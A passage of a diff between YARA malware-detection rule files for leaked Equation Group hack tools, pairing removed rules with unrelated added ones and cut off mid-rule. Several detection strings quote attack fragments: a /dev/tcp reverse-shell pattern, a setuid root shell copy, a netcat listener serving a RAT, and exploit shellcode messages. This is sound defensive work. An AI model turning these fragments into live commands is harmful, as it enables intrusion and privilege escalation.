-		$x3 = "cp /var/log/audit/audit.log .tmp" ascii
-		$l1 = "Here is the first good cron session from" fullword ascii
-		$l2 = "No need to clean LOGIN lines." fullword ascii
+		$x1 = "#Provide hex or EP log as command-line argument or as input" fullword ascii
+		$x2 = "print \"Gimme hex: \";" fullword ascii
+		$x3 = "if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" fullword ascii
+		$s1 = "if ($_ =~ /InstallDate/) {" fullword ascii
+		$s2 = "if (not($cmdInput)) {" fullword ascii
+		$s3 = "print \"$hex in decimal=$dec\\n\\n\";" fullword ascii
 
 	condition:
-		( filesize < 300KB and 1 of them )
+		filesize < 2KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Reverse_Shell : FILE
+rule SIGNATURE_BASE_EQGRP_Teflondoor : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
+		description = "Detects tool from EQGRP toolset - file teflondoor.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0e9b8ff2-2187-5b61-a086-2ad4ff1a3b10"
-		date = "2017-04-08"
+		id = "188f9ef1-5524-50be-ac62-91cb9726b155"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L104-L118"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L52-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6dc388fecbf606b19c04626d64f5fe4184f07c2a1597a6f8337aa4a827b2d89b"
+		logic_hash = "38be3cfa638509d539bf4ada3b5c7e44e01ee4cfb74a53a76cd2f4287c5a56f5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
 
 	strings:
-		$s1 = "sh >/dev/tcp/" ascii
-		$s2 = " <&1 2>&1" fullword ascii
+		$x1 = "%s: abort.  Code is %d.  Message is '%s'" fullword ascii
+		$x2 = "%s: %li b (%li%%)" fullword ascii
+		$s1 = "no winsock" fullword ascii
+		$s2 = "%s: %s file '%s'" fullword ascii
+		$s3 = "peer: connect" fullword ascii
+		$s4 = "read: write" fullword ascii
+		$s5 = "%s: done!" fullword ascii
+		$s6 = "%s: %li b" fullword ascii
 
 	condition:
-		( filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) and 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Tnmunger : FILE
+rule SIGNATURE_BASE_EQGRP_Durablenapkin_Solaris_2_0_1 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
+		description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c95dd24f-ffc9-5e58-aed7-205daa001b8c"
-		date = "2017-04-08"
+		id = "7b49a26d-9ee3-5aff-93fc-509239daef28"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L120-L134"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L75-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ddb957ca9350288d0fa98ba20847a99dcba931b5a03d0ae94cd3409f82f728eb"
+		logic_hash = "113f9451d6792511baa168957c643de02f37826b32944ef882f49b68496ec596"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
 
 	strings:
-		$s1 = "TEST: mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
-		$s2 = "mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
+		$s1 = "recv_ack: %s: Service not supplied by provider" fullword ascii
+		$s2 = "send_request: putmsg \"%s\": %s" fullword ascii
+		$s3 = "port undefined" fullword ascii
+		$s4 = "recv_ack: %s getmsg: %s" fullword ascii
+		$s5 = ">> %d -- %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 10KB and 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Ys_Ratload : FILE
+rule SIGNATURE_BASE_EQGRP_Teflonhandle : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
+		description = "Detects tool from EQGRP toolset - file teflonhandle.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
-		date = "2017-04-08"
+		id = "4d82cc41-3777-5f8c-9392-aca69e6ed781"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L136-L151"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L94-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "82d00b7eecdb60911ecd933387eeb2ce4eec9721993beee60247d1273ad3368f"
+		logic_hash = "7dfa713b763c983219f008405e1ebf3dfe386672f2d4e5fb54b2b362023ae08a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
 
 	strings:
-		$x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii
-		$x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
-		$x3 = "CALLBACK_PORT=32177" fullword ascii
+		$s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" fullword ascii
+		$s2 = "File %s already exists.  Overwrite? (y/n) " fullword ascii
+		$s3 = "Random Key : 0x" fullword ascii
+		$s4 = "done (%i bytes written)." fullword ascii
+		$s5 = "%s --> %s..." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Eh_1_1_0 : FILE
+rule SIGNATURE_BASE_EQGRP_False : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
+		description = "Detects tool from EQGRP toolset - file false.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a6f0ec1f-b0e5-5913-970d-9cdadf647c44"
-		date = "2017-04-08"
+		id = "3a68790b-38fc-570b-8b19-c5478cdd2842"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L153-L168"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L113-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d0972bb57076606b3c84f3cbbb0be85cd5663c7cd6f6d9f09a2991cb6532bfa9"
+		logic_hash = "a1938bc7a5a7a1bb382c2bab976013a1adedc045e0312daabe1bdcdd65d0c606"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
 
 	strings:
-		$x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii
-		$x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
-		$x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii
+		$s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+			00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75
+			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+			00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20
+			2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E
+			0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E
+			0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00
+			00 25 64 20 2D 20 25 64 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 100KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1
 }
-rule SIGNATURE_BASE_Equationgroup_Evolvingstrategy_1_0_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Dn_1_0_2_1 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
+		description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux"
 		author = "Florian Roth (Nextron Systems)"
-		id = "465f709b-1791-5b36-836b-7a0c08bb9b88"
-		date = "2017-04-08"
+		id = "24b5fb51-2463-56ef-818a-949b4b3bbf5b"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L170-L188"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L136-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87d25f1a4ca4a75292ab6cdcd1a79890c4475c2a9b34761ed92988bd517b4497"
+		logic_hash = "9b6420401419b280f01f7fc73412386a19e94a57e589a043b231b6a721585c99"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
 
 	strings:
-		$s1 = "chown root sh; chmod 4777 sh;" fullword ascii
-		$s2 = "cp /bin/sh .;chown root sh;" fullword ascii
-		$l1 = "echo clean up when elevated:" fullword ascii
-		$x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii
+		$s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" fullword ascii
+		$s2 = "invalid format suggest DMAC=00:00:00:00:00:00" fullword ascii
+		$s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" fullword ascii
+		$s4 = "Not everything is set yet" fullword ascii
 
 	condition:
-		( filesize < 4KB and 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toast_V3_2_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Morel : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux"
+		description = "Detects tool from EQGRP toolset - file morel.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "776014ae-be94-5d81-bceb-fefb67ee1994"
-		date = "2017-04-08"
+		id = "e741b727-0e41-53d0-832c-df7f4ea7964a"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L190-L205"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L154-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a505eaafb6882e2701fe0a9b8712f85c1073d83291436eeaa7f4c52876d12359"
+		logic_hash = "463d628bb19e27e94dcccc4c7d435d86111d51aa9f77c5ca1a199d9aaa9017ba"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b"
+		hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f"
 
 	strings:
-		$x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii
-		$s5 = "Roasting ->%s<- at ->%d:%d<-" ascii
-		$s6 = "rbnoil -Roasting ->" fullword ascii
+		$s1 = "%d - %d, %d" fullword ascii
+		$s2 = "%d - %lu.%lu %d.%lu" fullword ascii
+		$s3 = "%d - %d %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Sshobo : FILE
+rule SIGNATURE_BASE_EQGRP_Bc_Parser : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
+		description = "Detects tool from EQGRP toolset - file bc-parser"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b9392aec-34a8-5ad2-b3fd-eea907d19701"
-		date = "2017-04-08"
+		id = "ed4523de-b126-503a-83bd-aafd8533b0e5"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L207-L223"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L172-L187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "90c892e06ccedb6a3208d728e9f3c27c14bbe1b4c13b63d4a350bbbf38efbe9d"
+		logic_hash = "e8911acc1173e1149fd11dd795b72ba26bc654cbc7f9d95053ce420663fcafe9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
+		hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee"
 
 	strings:
-		$x1 = "Requested forwarding of port %d but user is not root." fullword ascii
-		$x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii
-		$x3 = "~#  - list forwarded connections" fullword ascii
-		$x4 = "packet_inject_ignore: block" fullword ascii
+		$s1 = "*** Target may be susceptible to FALSEMOREL      ***" fullword ascii
+		$s2 = "*** Target is susceptible to FALSEMOREL          ***" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 600KB and all of them )
+		uint16( 0 ) == 0x457f and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Magicjack_V1_1_0_0_Client_1_1_0_0 : FILE
+rule SIGNATURE_BASE_EQGRP_1212 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
+		description = "Detects tool from EQGRP toolset - file 1212.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "008cb5cf-1d2d-5312-9474-2f93db190974"
-		date = "2017-04-08"
+		id = "428fed4f-df5c-5fc2-ac4b-4dea69ea4f2d"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L225-L239"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L189-L207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "44e853b8d148f84107d29449aa44b2e52226c9d2f397c019aa0f1d347863e388"
+		logic_hash = "1be7ed8fdfaecc6e55c4d1e75cf841f4620df3d2abe6aed2761aed20c42f70bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
 
 	strings:
-		$x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii
-		$x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii
+		$s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" fullword ascii
+		$s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" fullword ascii
+		$s3 = "return \"ERROR:$line is not a valid port\";" fullword ascii
+		$s4 = "$dstport=hextoPort($dstport);" fullword ascii
+		$s5 = "sub hextoPort" fullword ascii
+		$s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 80KB and 1 of them )
+		filesize < 6KB and 4 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Packrat : FILE
+rule SIGNATURE_BASE_EQGRP_1212_Dehex : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
+		description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c0619c4-728f-591f-aa02-7c28f1f42fd1"
-		date = "2017-04-08"
+		id = "2cc375e6-2bff-5623-b86c-a6413f736c42"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L241-L256"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L209-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7e88e14e0d9c8e8f5ccca3bea78b875bf75fbf0dd54badc339237ca94f0d6373"
+		logic_hash = "74d1b0e820696cd5507996996bead50d283e83095bc7288a6e8e484738b6348b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
 
 	strings:
-		$x2 = "Use this on target to get your RAT:" fullword ascii
-		$x3 = "$ratremotename && " fullword ascii
-		$x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii
+		$s1 = "return \"ERROR:$line is not a valid address\";" fullword ascii
+		$s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" fullword ascii
+		$s3 = "push(@octets,$byte_table{$tempi});" fullword ascii
+		$s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
+		$s5 = "print hextoIP($ARGV[0]);" fullword ascii
 
 	condition:
-		( filesize < 70KB and 1 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 6KB and ( 5 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Telex : FILE
+rule SIGNATURE_BASE_Install_Get_Persistent_Filenames : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
+		description = "EQGRP Toolset Firewall - file install_get_persistent_filenames"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23571734-869d-5d68-9339-d82f168c2e47"
-		date = "2017-04-08"
+		id = "cf74b479-4b78-537a-878c-2f3ce004b775"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L258-L274"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L237-L250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9661bc43831307cb04883cfe8e54ebb2fe72bf3d7731b2b483cd19c40a5aeaa9"
+		logic_hash = "be07e3e3e96dd4676a76b32eb8fc47b2ab1f66ebbd6c2a3f1c88fc224f9f39ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
+		hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291"
 
 	strings:
-		$x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii
-		$x2 = "target is not vulnerable. exiting" fullword ascii
-		$s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii
-		$s4 = "Timeout waiting for daemon to die.  Exploit probably failed." fullword ascii
+		$s1 = "Generates the persistence file name and prints it out." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
+		( uint16( 0 ) == 0x457f and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Calserver : FILE
+rule SIGNATURE_BASE_EQGRP_Create_Dns_Injection
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
+		description = "EQGRP Toolset Firewall - file create_dns_injection.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "abe935ee-8579-54f0-b6d3-172d6e2c0482"
-		date = "2017-04-08"
+		id = "ef358ca6-ebd8-5d08-944b-f1fcd112f1f3"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L276-L291"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L252-L266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "85080074058703a696ac7f978abd8f4d5234f6553c19736fb52375421c4af42b"
+		logic_hash = "a07cb33c459208410b326fc260e96e617385ee4eac905a92d9542cb5ec73713e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
+		hash1 = "488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32"
 
 	strings:
-		$x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii
-		$x2 = "Writing your %s to target." fullword ascii
-		$x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii
+		$s1 = "Name:   A hostname: 'host.network.com', a decimal numeric offset within" fullword ascii
+		$s2 = " www.badguy.net,CNAME,1800,host.badguy.net \\\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Porkclient : FILE
+rule SIGNATURE_BASE_EQGRP_Screamingplow
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
+		description = "EQGRP Toolset Firewall - file screamingplow.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b34d5f9-bc76-5cc7-92f7-32c2b7ef7bcf"
-		date = "2017-04-08"
+		id = "cb535ef0-e3ea-54cc-9082-3d63cc96d93a"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L293-L308"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L268-L282"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4de13f1cac8698fc86e44d29143877924aec4e6712415ee6b35810afed8072d6"
+		logic_hash = "429ff81b6079785cc45d81b5ebf8bccd49f30484ca692017b0b66484463606d4"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
+		hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a"
 
 	strings:
-		$s1 = "-c COMMAND: shell command string" fullword ascii
-		$s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii
-		$s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii
+		$s1 = "What is the name of your PBD:" fullword ascii
+		$s2 = "You are now ready for a ScreamPlow" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Electricslide : FILE
+rule SIGNATURE_BASE_EQGRP_Mixtext
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
+		description = "EQGRP Toolset Firewall - file MixText.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b1e5293-806a-58e6-b865-66025c8d8c32"
-		date = "2017-04-08"
+		id = "99b06100-8a05-5c22-8b7d-ed451d5f4e81"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L310-L326"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L284-L297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0803b61afc592d4fba523dc54d8f856a557b916a9f6e256efccd50178e8e024c"
+		logic_hash = "cae2437124ad6e69b04a1338b651e33c7358b7fedd0613f3fa1025cf980e14ab"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
+		hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795"
 
 	strings:
-		$x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii
-		$x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii
-		$x3 = "Usage: eslide   [options] <-t profile> <-l listenerip> <targetip>" fullword ascii
-		$x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii
+		$s1 = "BinStore enabled implants." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Libxmexploit2 : FILE
